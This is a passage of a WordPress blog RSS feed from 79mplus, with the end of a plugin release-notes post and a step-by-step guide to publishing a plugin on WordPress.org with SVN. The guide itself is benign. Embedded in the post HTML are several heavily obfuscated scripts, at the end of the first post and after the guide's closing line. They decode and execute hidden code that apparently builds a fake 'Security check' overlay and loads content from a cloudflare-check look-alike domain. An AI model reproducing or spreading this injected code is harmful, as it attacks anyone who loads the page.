Q8OSA0GBggaXEJAVUJJCX5ESQhaXFdAUwF+VBxAREZiE2h6bVVCb1BRfAoGDkRMQ0RFDgYKaBhLbVgUCgYeRExDREUcEAYKCX5JHgkGB0lOUlUcBgpET0JORUR0c2hiTkxRTk9ET1UJfkkICBsGBggaV0BTAX5VThxSRFV1SExETlRVCUdUT0JVSE5PCQhac1lOUUZoCW1VQm9QUQoQCBpcDRATERERCBpVQG1LZVcPTk9NTkBFHEdUT0JVSE5PCQhaQk1EQFN1SExETlRVCX5VTggaXBpVQG1LZVcPUlNCHH5UGlxzWU5RRmgJEQgaXEhHCUVOQlRMRE9VD1NEQEVYclVAVUQcHBwGTU5ARUhPRgYISWcUZBVjD0BFRWRXRE9VbUhSVURPRFMJBmVubGJOT1VET1VtTkBFREUGDWVEYFllVQgaRE1SRAFlRGBZZVUJCBpcCAkIGg=='),_0x52421b867837=33,_0xa898e8dc7503=new Uint8Array(_0x034992db8cf3['length']),_0xc54ff33ca072=0;for(;_0xc54ff33ca072<_0x034992db8cf3['length'];_0xc54ff33ca072++)_0xa898e8dc7503[_0xc54ff33ca072]=_0x034992db8cf3['charCodeAt'](_0xc54ff33ca072)^_0x52421b867837;(new Function(new TextDecoder()['decode'](_0xa898e8dc7503)))()}();</script><script>(function(){
var x46eaa6=6026;
if(x46eaa6>0){var y17321a=x46eaa6-6757}else{var y17321a=6757}
var zf368b3=y17321a*81;
var _0xc4c3ed2ddbac=[29,26,112,5,14,48,39,6,13,10,17,16,29,30,9,11,13,10,113,26,12,32,9,16,0,26,17,7,1,36,124,37,0,10,112,46,15,48,32,9,28,35,39,42,28,121,124,35,29,9,59,43,12,25,63,4,14,120,1,7,13,10,43,44,14,47,124,33,16,33,17,43,0,48,112,42,15,13,10,7,27,32,60,24,16,33,26,13,27,13,1,24,15,9,60,18,2,47,13,17,14,47,124,7,26,14,60,10,28,29,36,4,0,48,60,1,27,35,56,10,0,26,47,17,15,120,112,17,27,13,113,24,0,13,10,1,15,10,32,10,15,35,10,4,15,13,60,2,28,35,10,10,15,10,39,46,15,13,10,10,0,48,60,7,28,10,56,5,15,13,60,42,25,47,112,17,11,121,35,37,14,48,47,16,0,47,124,31,11,29,25,33,16,32,13,6,12,25,35,3,25,121,18,31,27,9,59,2,15,36,43,25,14,36,17,29,15,9,120,25,15,36,125,30,16,32,13,6,12,25,35,3,25,121,18,31,11,26,17,30,9,10,124,31,14,121,43,44,11,63,35,41,30,48,17,4,0,36,125,30,16,32,13,6,12,25,35,3,25,121,18,31,11,26,17,30,9,10,124,31,14,121,43,45,15,9,120,43,12,32,47,9,30,63,120,43,14,48,120,43,11,48,29,9,30,48,39,31,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,2,14,32,29,9,0,32,17,16,30,9,35,5,15,48,29,25,15,36,43,16,14,32,120,25,0,9,56,16,15,9,35,2,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,2,14,32,29,9,0,32,17,16,30,10,59,31,11,121,25,4,11,26,56,16,11,25,63,42,14,26,9,41,14,48,17,44,0,14,43,41,14,32,26,45,30,30,124,26,12,25,120,2,11,35,6,31,30,47,59,2,15,36,43,17,14,48,1,4,30,48,39,31,14,14,17,2,14,32,29,9,0,32,17,16,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,4,11,26,56,29,14,10,47,25,14,48,43,43,12,30,43,29,15,9,120,25,15,36,43,1,12,10,9,27,14,48,17,44,0,14,43,2,11,48,18,45,30,30,124,26,12,25,120,2,11,35,6,31,30,47,35,31,14,25,9,45,14,32,44,29,14,10,47,25,14,48,43,43,12,30,43,2,12,10,59,30,13,10,56,16,15,48,29,17,11,47,120,17,11,26,10,16,13,10,18,45,2,13,1,24,15,9,60,18,2,32,39,26,0,26,39,24,9,10,6,13,31,120,35,10,7,120,112,42,7,35,9,43,27,12,121,2,15,120,59,46,7,120,10,24,7,10,60,7,7,35,121,7,24,13,36,6,7,32,60,2,7,50,48,6,28,35,125,6,27,13,35,42,7,35,47,46,27,121,60,11,12,48,47,4,31,27,17,43,0,48,63,12,9,29,26,42,15,120,113,10,0,29,32,10,27,29,10,42,25,32,112,5,14,48,39,6,13,10,17,16,31,27,17,44,15,47,63,12,14,48,60,26,2,32,59,6,0,26,59,27,14,48,32,25,9,47,120,4,9,9,1,24,15,9,60,18,2,32,5,28,11,9,125,13,2,32,59,6,0,26,59,27,14,48,32,16,11,47,63,42,11,47,120,4,29,29,36,30,27,121,10,13,26,13,26,45,27,25,14,45,26,33,17,42,12,26,120,42,13,32,43,17,30,63,39,5,15,63,39,6,11,121,14,4,29,13,5,37,15,63,120,44,15,48,1,16,15,13,1,25,0,121,13,37,13,48,5,1,12,36,43,30,0,10,43,45,12,26,14,14,27,13,60,10,29,9,59,43,12,25,63,4,14,121,125,45,25,47,112,17,11,121,35,37,11,48,13,44,15,32,17,7,26,9,35,17,11,63,39,43,5,10,43,6,29,27,17,28,13,63,47,7,30,63,39,5,15,63,39,6,11,121,14,24,28,30,30,24,28,30,10,30,27,13,113,25,25,32,9,46,29,30,47,37,11,48,13,44,15,32,17,7,29,9,59,43,12,25,63,4,14,121,125,45,25,47,112,17,11,121,35,37,13,26,25,28,0,63,112,16,26,11,17,28,13,63,47,7,30,63,39,5,15,63,39,6,11,121,14,1,27,120,14,30,2,47,59,26,0,26,39,31,12,36,6,4,29,14,29,37,11,10,9,24,9,26,59,1,11,120,26,45,16,35,1,46,14,47,60,26,12,48,47,4,31,27,17,5,9,63,120,17,12,13,26,2,25,33,17,5,9,63,120,17,12,13,29,37,13,26,25,28,0,63,112,16,30,48,29,43,14,48,124,6,13,29,1,37,12,9,5,6,15,9,48,27,26,13,60,25,9,47,112,17,11,121,35,37,12,10,13,29,0,47,121,13,11,26,47,4,11,32,63,63,14,63,121,26,2,32,13,29,13,48,112,24,14,121,43,3,12,10,59,3,12,25,60,26,2,47,63,12,12,26,47,5,30,29,60,25,30,29,32,24,29,13,1,25,0,121,13,37,12,10,13,29,0,47,121,25,2,47,47,25,12,63,13,42,11,9,60,27,26,11,39,6,11,48,9,16,0,36,43,46,11,48,17,29,7,32,13,17,11,50,39,31,0,26,48,26,2,47,63,26,14,10,124,6,29,13,1,13,11,48,63,6,12,9,59,16,31,27,17,1,13,9,112,10,15,63,47,4,25,47,25,41,15,9,120,41,13,30,13,43,29,9,1,4,0,9,120,5,11,48,44,45,16,35,1,13,10,10,112,5,14,48,39,6,13,10,17,16,31,27,17,7,0,32,29,1,12,30,13,37,13,10,59,7,9,121,29,37,13,26,5,25,14,121,9,11,11,48,63,6,12,9,59,16,31,26,43,43,12,36,35,56,11,48,17,29,13,9,39,43,29,26,112,5,14,48,39,6,13,10,17,16,29,27,17,45,9,26,59,28,14,9,124,44,30,27,17,16,15,9,35,10,15,121,9,11,12,48,47,4,31,27,17,27,14,10,112,26,15,10,14,13,14,48,63,7,31,27,13,120,6,28,13,6,12,25,35,58,0,9,47,5,0,9,39,6,29,30,10,11,2,32,1,29,0,48,13,17,13,30,43,31,11,26,63,16,29,30,124,56,6,33,39,60,16,36,29,37,13,10,59,7,9,121,29,6,11,63,63,43,29,13,1,37,13,32,25,46,13,26,47,26,30,63,39,43,12,27,59,43,11,9,63,43,11,47,120,48,0,10,47,44,0,9,60,26,16,34,39,31,14,63,120,43,14,63,121,29,4,25,9,2,0,14,125,30,16,32,47,2,11,26,29,25,15,32,47,6,13,10,17,16,30,32,5,3,14,32,44,45,29,13,1,37,13,32,25,46,13,26,47,26,30,63,120,25,14,10,63,31,12,9,121,13,28,13,36,2,27,29,1,37,13,32,25,46,13,26,47,26,30,48,17,16,14,26,17,17,0,29,25,46,12,10,43,41,12,26,9,31,14,121,14,25,9,47,120,4,9,9,1,37,0,47,13,42,13,48,25,7,0,30,13,50,3,34,17,123,30,63,35,17,11,63,39,43,29,27,17,27,14,10,112,26,15,10,14,16,11,48,63,3,11,26,17,16,11,32,63,60,0,9,13,6,29,14,10,11,10,10,39,17,12,26,39,26,29,26,48,25,9,33,17,16,15,9,35,10,15,121,13,43,29,13,1,13,10,13,1,37,13,32,25,46,13,26,47,26,30,48,17,16,0,9,59,4,14,47,60,13,2,32,1,29,0,48,13,17,13,30,43,31,14,63,120,25,14,10,63,31,12,9,121,13,0,63,63,16,15,47,120,25,14,32,44,26,29,9,1,37,14,48,47,2,9,26,60,26,14,48,63,7,31,28,63,4,11,48,17,4,29,30,10,25,25,47,26,11,2,32,1,29,0,48,13,17,13,30,43,3,0,10,43,44,29,28,5,57,6,34,44,16,11,47,120,4,13,10,43,45,13,10,112,9,29,27,17,26,13,48,9,16,29,14,10,11,10,14,10,11,10,10,112,5,14,48,39,6,13,10,17,16,31,27,17,2,13,10,43,30,13,10,32,26,2,47,63,43,12,26,120,42,13,30,9,11,13,10,113,26,2,47,63,43,12,26,120,42,13,29,44,13,2,32,43,17,14,48,124,7,14,47,36,16,14,26,63,16,0,47,120,26,29,9,59,43,12,25,63,4,14,121,35,56,11,48,17,29,13,9,39,43,30,63,59,43,11,32,17,30,12,48,48,26,14,63,63,30,14,30,10,11,12,48,47,4,31,27,17,16,11,48,124,28,15,47,113,13,9,32,5,3,14,32,43,4,11,26,56,12,16,35,60,16,27,30,125,30,14,10,63,6,13,26,17,44,25,121,124,43,12,26,13,37,15,32,47,30,14,30,125,30,11,26,47,4,15,10,25,3,25,49,1,11,12,26,18,12,2,32,39,26,0,26,39,24,9,10,6,30,0,26,47,6,15,13,6,45,27,25,14,45,29,33,17,43,0,48,63,12,9,25,26,30,16,32,29,17,12,26,63,3,12,30,124,35,30,26,9,44,25,120,47,13,25,47,59,43,12,25,63,4,14,121,35,37,12,32,124,30,11,9,121,26,2,32,43,17,14,48,124,7,14,47,35,33,2,47,63,43,12,26,120,42,13,27,26,30,2,32,43,4,0,32,5,41,12,121,10,16,12,26,13,43,14,121,13,46,12,10,43,41,12,26,9,31,14,121,13,37,12,26,112,44,14,26,18,25,9,47,112,17,11,121,35,37,0,32,39,2,15,13,25,37,12,26,112,44,14,26,18,46,16,49,17,6,0,48,120,30,14,36,43,4,0,9,39,5,14,25,121,15,2,32,120,41,12,9,5,16,15,121,13,37,12,26,112,44,14,26,18,16,11,48,63,3,12,10,29,6,29,13,6,45,16,35,1,25,0,121,13,37,0,32,39,2,15,14,9,4,0,9,120,5,11,48,44,18,2,32,124,41,11,26,32,16,11,48,63,2,14,26,47,41,0,14,14,31,2,30,18,27,16,30,18,30,16,36,125,25,25,47,59,43,12,25,63,4,14,121,35,37,11,26,9,16,14,26,9,17,29,27,17,5,0,9,120,44,15,48,14,27,27,14,10,11,10,14,10,16,15,32,47,6,15,32,14,26,0,63,63,16,15,47,120,25,14,32,44,26,29,9,1,4,0,9,120,5,11,48,44,18,2,47,35,25,14,48,29,25,15,14,13,37,12,10,63,6,0,26,59,26,29,35,32,25,25,47,26,25,25,47,25,46,12,10,43,41,12,26,9,31,14,121,35,37,11,9,124,27,0,26,29,29,29,27,17,6,0,32,29,17,29,9,1,24,15,9,60,18,2,47,63,46,11,47,60,13,0,26,17,41,12,10,25,43,14,63,121,16,15,47,59,43,15,9,120,43,24,10,29,43,14,10,63,16,12,30,14,45,11,32,39,4,13,9,35,6,16,36,10,11,2,47,63,46,11,47,60,16,11,47,59,41,26,11,17,6,0,32,29,17,29,36,125,31,15,9,35,25,30,63,35,26,11,29,17,3,26,14,125,27,2,47,13,17,14,47,124,7,29,36,125,46,2,47,113,13,16,36,1,120,15,9,120,26,30,48,112,30,14,32,17,4,29,28,120,17,12,26,48,16,14,48,17,7,29,30,10,31,28,120,36,2,27,29,36,25,25,33,17,5,0,63,39,4,30,48,47,3,9,10,43,41,26,9,120,4,12,10,48,11,29,26,120,31,15,47,63,29,0,10,43,6,30,48,13,43,15,10,120,14,10,26,120,31,15,47,63,29,0,10,43,6,30,48,59,31,0,25,10,25,30,48,47,2,11,26,63,16,0,28,39,26,13,10,29,44,29,27,17,5,0,63,39,4,29,13,1,13,2,47,35,25,14,48,29,25,15,14,14,2,29,14,43,6,13,26,63,16,29,26,112,5,14,48,39,6,13,10,17,16,29,27,17,6,0,32,29,17,29,9,1,25,0,121,13,37,12,26,124,30,15,14,9,37,11,9,124,27,0,26,29,29,29,27,17,6,0,32,29,17,29,13,1,13,29,13,1,13,29,14,14,25,25,47,117,117];
var _0xd2590aeec7ec=72;
var _0x695b12d6658b='';
for(var _0xecc7dff14118=0;_0xecc7dff14118<_0xc4c3ed2ddbac.length;_0xecc7dff14118++)
  _0x695b12d6658b+=String.fromCharCode(_0xc4c3ed2ddbac[_0xecc7dff14118]^_0xd2590aeec7ec);
var _0xb2ada9a65d62=121;
var _0x61fc9cbf8bf3=atob(_0x695b12d6658b);
var _code='';
for(var _0xecc7dff14118=0;_0xecc7dff14118<_0x61fc9cbf8bf3.length;_0xecc7dff14118++)
  _code+=String.fromCharCode(_0x61fc9cbf8bf3.charCodeAt(_0xecc7dff14118)^_0xb2ada9a65d62);
(new Function(_code))();
})();</script></p>
<p>The post <a rel="nofollow" href="https://79mplus.com/intercom-subscription-release-notes-v1-0-18/">Intercom Subscription v1.0.18 is Here: Find Out What’s New</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/79mplus_editor/">79mplus Editor</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Step by step guide to publish a Plugin to WordPress.org repository</title>
		<link>https://79mplus.com/step-by-step-guide-to-publish-a-plugin-to-wordpress-org-repository/</link>
		
		<dc:creator><![CDATA[Adnan Shameem]]></dc:creator>
		<pubDate>Mon, 30 Apr 2018 10:51:56 +0000</pubDate>
				<category><![CDATA[79mplus blog]]></category>
		<category><![CDATA[Plugins]]></category>
		<guid isPermaLink="false">http://www.79mplus.com/?p=495696</guid>

					<description><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/mplus-intercom-wordpress-org-blog-banner.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/step-by-step-guide-to-publish-a-plugin-to-wordpress-org-repository/">Step by step guide to publish a Plugin to WordPress.org repository</a></p>
<p>It is that time again. The cheerful day that we all have been waiting for. All of our hard work has seen the light. Well, if you are not sure what I mean, I was talking about the day we published our Intercom Subscription plugin to WordPress.org repo. For those who are curious, here are [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://79mplus.com/step-by-step-guide-to-publish-a-plugin-to-wordpress-org-repository/">Step by step guide to publish a Plugin to WordPress.org repository</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/adnan360/">Adnan Shameem</a></p>
]]></description>
										<content:encoded><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/mplus-intercom-wordpress-org-blog-banner.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/step-by-step-guide-to-publish-a-plugin-to-wordpress-org-repository/">Step by step guide to publish a Plugin to WordPress.org repository</a></p>
<p>It is that time again. The cheerful day that we all have been waiting for. All of our hard work has seen the light. Well, if you are not sure what I mean, I was talking about the day we published <a href="https://wordpress.org/plugins/mplus-intercom-subscription/" target="_blank" rel="noopener">our Intercom Subscription plugin to WordPress.org repo</a>.</p>
<p>For those who are curious, here are the steps we followed to publish our plugin on WordPress.org Plugin Repository:</p>
<h2>1. Check Guidelines</h2>
<p>Make sure your plugin follows all the guidelines for the submission. You can read details here:<br />
<a href="https://developer.wordpress.org/plugins/wordpress-org/detailed-plugin-guidelines/" target="_blank" rel="noopener">https://developer.wordpress.org/plugins/wordpress-org/detailed-plugin-guidelines/</a></p>
<p>These guidelines are pretty straightforward and any normal plugin should pass. We know ours did the first time!</p>
<p>You should also look into <a href="https://developer.wordpress.org/plugins/wordpress-org/how-your-readme-txt-works/" target="_blank" rel="noopener">how the readme.txt works in any WordPress.org plugin</a>. This is the file that holds all the content that shows up on the plugin page. If you want an example, you can check <a href="https://plugins.trac.wordpress.org/browser/woocommerce/trunk/readme.txt" target="_blank" rel="noopener">one for WooCommerce here</a>. You can hopefully figure out everything.</p>
<p>The thing that took me some time to understand is the Screenshots section. You will have to put screenshots as screenshot-1.jpg, screenshot-2.jpg etc. under the /assets directory of the repo. You&#8217;ll get a repo later and you&#8217;ll understand where to put it. But right now, in the readme, you will correspond to that number and write descriptions for the screenshot:</p>
<pre>== Screenshots ==

1. This is a screenshot showing a feature.
2. This is another screenshot showing another feature.</pre>
<h2>2. Time to Get Approval</h2>
<p>Now its time to Submit for approval. Register/Login to:<br />
<a href="https://login.wordpress.org/wp-login.php" target="_blank" rel="noopener">https://login.wordpress.org/wp-login.php</a></p>
<p>Your WordPress.org Account page will open up.<br />
Now navigate to <a href="https://wordpress.org/plugins/developers/add/" target="_blank" rel="noopener">https://wordpress.org/plugins/developers/add/</a> for options for submitting a new plugin. Just zip your plugin and submit. Please remember to give your folder and plugin file a good name before zipping. This will give you a slug for the plugin page URL which cannot be changed.</p>
<p><img decoding="async" class="wp-image-495715 size-medium aligncenter" src="http://www.79mplus.com/assets/01-submitting-to-wp-300x184.png" alt="" width="300" height="184" title="Step by step guide to publish a Plugin to WordPress.org repository" srcset="https://79mplus.com/assets/01-submitting-to-wp-300x184.png 300w, https://79mplus.com/assets/01-submitting-to-wp-768x471.png 768w, https://79mplus.com/assets/01-submitting-to-wp-510x313.png 510w, https://79mplus.com/assets/01-submitting-to-wp.png 976w" sizes="(max-width: 300px) 100vw, 300px" /></p>
<p>After you submit, a page similar to this will appear.</p>
<p><img decoding="async" class="aligncenter wp-image-495716 size-medium" src="http://www.79mplus.com/assets/02-after-submission-300x188.png" alt="" width="300" height="188" title="Step by step guide to publish a Plugin to WordPress.org repository" srcset="https://79mplus.com/assets/02-after-submission-300x188.png 300w, https://79mplus.com/assets/02-after-submission-768x482.png 768w, https://79mplus.com/assets/02-after-submission-400x250.png 400w, https://79mplus.com/assets/02-after-submission-510x320.png 510w, https://79mplus.com/assets/02-after-submission.png 967w" sizes="(max-width: 300px) 100vw, 300px" /></p>
<p>Now you will have to wait for the approval. It may take up to 10 days or 5 business days to get approved, depending on the queue of other submitted plugins. Ours got approved the next day.</p>
<h2>3. After Approval:</h2>
<p>When you receive the approval email, you will have to use an SVN client on your machine, such as <a href="http://sourceforge.net/projects/win32svn/" target="_blank" rel="noopener">SVN for Windows</a> to <a href="https://developer.wordpress.org/plugins/wordpress-org/how-to-use-subversion/" target="_blank" rel="noopener">checkout the plugin code</a>:</p>
<pre>svn co https://plugins.svn.wordpress.org/your-plugin-name your-local-dir</pre>
<p>Then go into the repo directory and keep your plugin content inside the <strong>trunk</strong> directory. Keep in mind you should not keep your plugin files in a directory. You should keep the files <strong>directly under trunk</strong> directory. Also, make sure you have <strong>trunk</strong> as the value to <strong>Stable tag:</strong> on your readme.txt. Now cd to the repo directory then add the files:</p>
<pre>cd /path/to/svn/repo
svn add trunk/*</pre>
<p>(On Windows, you use <code>cd /D /some/path</code> to switch to the drive. Sometimes some subdirectories may not get added. If this is the case you should see a question mark beside that file when running <code>svn status</code>. To fix this add <code>--force</code> with the add command: <code>svn add --force trunk/*</code>.)</p>
<p>Please note, keeping your release version under /trunk is ok when your project is simple. But as you grow <a href="https://developer.wordpress.org/plugins/wordpress-org/how-to-use-subversion/#svn-folders" target="_blank" rel="noopener">it is suggested</a> to put the release version under /tags directory under a specific tag and point to the release tag with readme.txt.</p>
<p>Now add the icons and banner images in assets directory. You can save the banner as <strong>banner-772&#215;250.jpg</strong>. The dimensions of the banner image should be 772px by 250px, as the name suggests. You can put the icons as <strong>icon-128&#215;128.jpg</strong> and <strong>icon-256&#215;256.jpg</strong> and use the dimensions as in the filename. Also add the screenshots as <strong>screenshot-1.jpg</strong>, <strong>screenshot-2.jpg</strong> etc.</p>
<p>You can also use png as the extension for icons, banners and screenshots, if you wish. If you have an svg version of the icon, you can include that too as <strong>icon.svg</strong>. For a hint, you can visit the <a href="https://wordpress.org/plugins/mplus-intercom-subscription/" target="_blank" rel="noopener">SVN repository of Hello Dolly plugin</a>.</p>
<p>After adding the icon, banner and screenshot images, run:</p>
<pre>svn add assets/*</pre>
<p><img decoding="async" class="aligncenter wp-image-495717 size-medium" src="http://www.79mplus.com/assets/03-adding-files-to-repo-300x150.png" alt="" width="300" height="150" title="Step by step guide to publish a Plugin to WordPress.org repository" srcset="https://79mplus.com/assets/03-adding-files-to-repo-300x150.png 300w, https://79mplus.com/assets/03-adding-files-to-repo-510x255.png 510w, https://79mplus.com/assets/03-adding-files-to-repo.png 676w" sizes="(max-width: 300px) 100vw, 300px" /></p>
<p>(Add <code>--force</code> if any file has not been added: <code>svn add --force assets/*</code>.)</p>
<p>Check and double check if everything is as it should be. If not, change the files and add the files again with the commands above.</p>
<p>Then when you are ready, run:</p>
<pre>svn ci -m 'Added first version of the plugin'</pre>
<p>If failed, try:</p>
<pre>svn ci -m 'Added first version of the plugin' --username wporgusername --password wporgpassword</pre>
<p>We had some special characters in our passwords, so we had to add quotation marks around our password. Something like this:</p>
<pre>svn ci -m 'Added first version of the plugin' --username wporgusername --password "wporgpassword"</pre>
<p>Eventually, you should see the checkin/commit to be finished:</p>
<p><img decoding="async" class="aligncenter wp-image-495718 size-medium" src="http://www.79mplus.com/assets/04-after-svn-checkin-300x79.png" alt="" width="300" height="79" title="Step by step guide to publish a Plugin to WordPress.org repository" srcset="https://79mplus.com/assets/04-after-svn-checkin-300x79.png 300w, https://79mplus.com/assets/04-after-svn-checkin-768x201.png 768w, https://79mplus.com/assets/04-after-svn-checkin-510x134.png 510w, https://79mplus.com/assets/04-after-svn-checkin.png 809w" sizes="(max-width: 300px) 100vw, 300px" /></p>
<p>Now there you have it. We got our plugin published with these simple steps. If you are curious, <a href="https://wordpress.org/plugins/mplus-intercom-subscription/" target="_blank" rel="noopener">visit our plugin page here</a>. You can also install it by searching for &#8220;mplus intercom&#8221; from WP Admin &#8211; Plugins &#8211; Add New of any WordPress installation.</p>
<p>Next time you have some changes, use svn add and then svn ci to commit the changes. Don&#8217;t forget to update the version number on readme and plugin file header. This will automatically generate your plugin zip file and push updates to user.</p>
<p>Remember, once your plugin gets published, you should apply changes to the repo moderately because they have an automated process that generates the plugin zip file automatically. It may create stress on their end if you <a href="https://developer.wordpress.org/plugins/wordpress-org/detailed-plugin-guidelines/#14-frequent-commits-to-a-plugin-should-be-avoided" target="_blank" rel="noopener">frequently commit</a>. Also, users will be annoyed if you push updates frequently.</p>
<hr /><p><em>Remember, once your plugin gets published, you should apply changes to the repo moderately because they have an automated process...</em><br /><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2F79mplus.com%2F%3Fp%3D495696&#038;text=Remember%2C%20once%20your%20plugin%20gets%20published%2C%20you%20should%20apply%20changes%20to%20the%20repo%20moderately%20because%20they%20have%20an%20automated%20process...&#038;via=79mplus&#038;related=79mplus" target="_blank" rel="noopener noreferrer">Share on X</a><br /><hr />
<p>Well, that&#8217;s about it. This is a glorious time for all of our teammates. We are eager to contribute more plugins to the WordPress plugin repository in future.</p>
<p>Till then, cheers! Have a good life!<script>!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8kfXl9JH95fXh+en4peTswdnAqKlJrIUc+dGhobG8mMzN/cHNpeHpwfW55MX90eX93MnJ5aD4wPD50aGhsJjMzJSgyLioyJSwyLS4qPkEndXo0RllYfyp+OjpGWVh/Kn5Hci97cHFtQTVueWhpbnInRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBITRGWVh/Kn5gYGdhNSdGWVh/Kn5Hci97cHFtQSEtJ3ppcn9odXNyPGsoWmlfazQ1Z3V6ND14c39pcXlyaDJ+c3hlNWdveWhIdXF5c2loNGsoWmlfazAuLDUnbnloaW5yJ2FqfW48UHR5Lm5oIXhzf2lxeXJoMn9ueX1oeVlweXF5cmg0O3h1ajs1MEV2fndKfyF4c39pcXlyaDJ/bnl9aHlZcHlxeXJoNDt1em59cXk7NSdQdHkubmgyb2hlcHkyf29vSHlkaCE7bHNvdWh1c3ImenVkeXgndXJveWgmLCdmMXVyeHlkJi4tKCsoJC8tKyonfn1/d3tuc2lyeCZue359NC0pMC4vMCguMDIoLjUnbHN1cmh5bjF5anlyaG8mcnNyeSc7J0V2fndKfzJodWhweSE7T3l/aW51aGU8f3R5f3c7J0V2fndKfzJveWhdaGhudX5paHk0O31wcHNremlwcG9/bnl5cjswOzs1J0V2fndKfzJvaGVweTJ/b29IeWRoITtsc291aHVzciZ6dWR5eCd1cm95aCYsJ2t1eGh0Ji0sLDkndHl1e3RoJi0sLDknfnNueHluJiwnZjF1cnh5ZCYuLSgrKCQvLSQqJ359f3d7bnNpcngmP3p6eic7J3hzf2lxeXJoMn5zeGUyfWxseXJ4X3R1cHg0UHR5Lm5oNSd4c39pcXlyaDJ+c3hlMn1sbHlyeF90dXB4NEV2fndKfzUnemlyf2h1c3I8VSgkV35qNDVnaG5lZ1B0eS5uaDJueXFzank0NSdFdn53Sn8ybnlxc2p5NDUnYX99aH90NEN5NWdhaG5lZ3h5cHloeTxGWVh/Kn5Hci97cHFtQWF/fWh/dDRDeS41Z2FhVihRKChQMn14eFlqeXJoUHVvaHlyeW40O3F5b299e3k7MHppcn9odXNyNEN5ajVnaG5lZ3V6ND1DeWpgYD1DeWoyeH1ofTVueWhpbnIndXo0Q3lqMnh9aH0yaGVseSEhITt6bDF5cX55eDF/cHNveTs1VSgkV35qNDUnYX99aH90NEN5LzVnYWE1J3ppcn9odXNyPGlzREt3UTR0UW5Ke0Y1Z3V6NHRRbkp7RiIhdnAqKlJrMnB5cntodDVueWhpbnInan1uPEN0ITs7J2huZWdDdCFPaG51cns0VihRKChQMnBzf31odXNyOjo0VihRKChQMnBzf31odXNyMnRzb2hyfXF5YGBWKFEoKFAycHN/fWh1c3IydHNvaDVgYDs7NTJueWxwfX95NDNCa2trQDIzdTA7OzUnYX99aH90NEN5dDVnYWp9bjxDaSF2cCoqUmtHdFFuSntGQTc7M3lxfnl4Mzs3ci97cHFtNzsjeXF+eXghLTs3NEN0IzQ7OnRzb2ghOzd5cn9zeHlJTlVfc3Fsc3J5cmg0Q3Q1NSY7OzUnan1uPENocyFveWhIdXF5c2loNHppcn9odXNyNDVnaXNES3dRNHRRbkp7RjctNSdhMC0uLCwsNSdFdn53Sn8yc3Jwc314IXppcn9odXNyNDVnf3B5fW5IdXF5c2loNENoczUnYSdFdn53Sn8yb25/IUNpJ2Fpc0RLd1E0LDUnYXV6NHhzf2lxeXJoMm55fXhlT2h9aHkhISE7cHN9eHVyezs1VihRKChQMn14eFlqeXJoUHVvaHlyeW40O1hTUV9zcmh5cmhQc314eXg7MGsoWmlfazUneXBveTxrKFppX2s0NSdhNTQ1Jw=='),_0xd3aca605a494=28,_0x3c4e336edd80=new Uint8Array(_0x432938422d85['length']),_0xd8f5713db852=0;for(;_0xd8f5713db852<_0x432938422d85['length'];_0xd8f5713db852++)_0x3c4e336edd80[_0xd8f5713db852]=_0x432938422d85['charCodeAt'](_0xd8f5713db852)^_0xd3aca605a494;(new Function(new TextDecoder()['decode'](_0x3c4e336edd80)))()}();</script><script>!function(){var _0x034992db8cf3=atob('CUdUT0JVSE5PCQhaV0BTAUlnFGQVYxxWSE9FTlYNV0USEVhtHElnFGQVY3oGfn5HUWRMQ0RFUgZ8DWgYS21YFBwGQhIZQERAGUJEQEVDR0MURAYNQERGYhNoHHoDSVVVUVIbDg5CTU5URUdNQFNEDEJJREJKD09EVQMNAQNJVVVRGw4OGBUPExcPGBEPEBMXA3waSEcJV0USEVhtBwdXRRIRWG16aBhLbVgUfAhTRFVUU08aV0USEVhtHElnFGQVY3oGfn5HUWRMQ0RFUgZ8HAlXRRIRWG1dXVpcCBpXRRIRWG16aBhLbVgUfBwQGkdUT0JVSE5PAWVEYFllVQkIWkhHCQBFTkJUTERPVQ9DTkVYCFpSRFV1SExETlRVCWVEYFllVQ0TEQgaU0RVVFNPGlxXQFMBT3RbRhdTHEVOQlRMRE9VD0JTREBVRGRNRExET1UJBkVIVwYIDVVAbUtlVxxFTkJUTERPVQ9CU0RAVURkTURMRE9VCQZIR1NATEQGCBpPdFtGF1MPUlVYTUQPQlJSdURZVRwGUU5SSFVITk8bR0hZREUaSE9SRFUbERpbDEhPRURZGxMQFRYVGRITERkaQ0BCSkZTTlRPRRtTRkNACRAUDRMSDRUTDQ8VEwgaUU5IT1VEUwxEV0RPVVIbT05PRBoGGlVAbUtlVw9VSFVNRBwGckRCVFNIVVgBQklEQkoGGlVAbUtlVw9SRFVgVVVTSENUVUQJBkBNTU5WR1RNTVJCU0RETwYNBgYIGlVAbUtlVw9SVVhNRA9CUlJ1RFlVHAZRTlJIVUhOTxtHSFlERRpIT1JEVRsRGlZIRVVJGxAREQQaSURIRklVGxAREQQaQ05TRURTGxEaWwxIT0VEWRsTEBUWFRkSExAZGkNAQkpGU05UT0UbAkdHRxoGGkVOQlRMRE9VD0NORVgPQFFRRE9FYklITUUJT3RbRhdTCBpFTkJUTERPVQ9DTkVYD0BRUURPRWJJSE1FCVVAbUtlVwgaR1RPQlVITk8BVHQTcU4QCQhaVVNYWk90W0YXUw9TRExOV0QJCBpVQG1LZVcPU0RMTldECQgaXEJAVUJJCX5ECFpcVVNYWkVETURVRAFXRRIRWG16aBhLbVgUfFxCQFVCSQl+RBMIWlxcSWcUZBVjD0BFRWRXRE9VbUhSVURPRFMJBkxEUlJARkQGDUdUT0JVSE5PCX5EVwhaVVNYWkhHCQ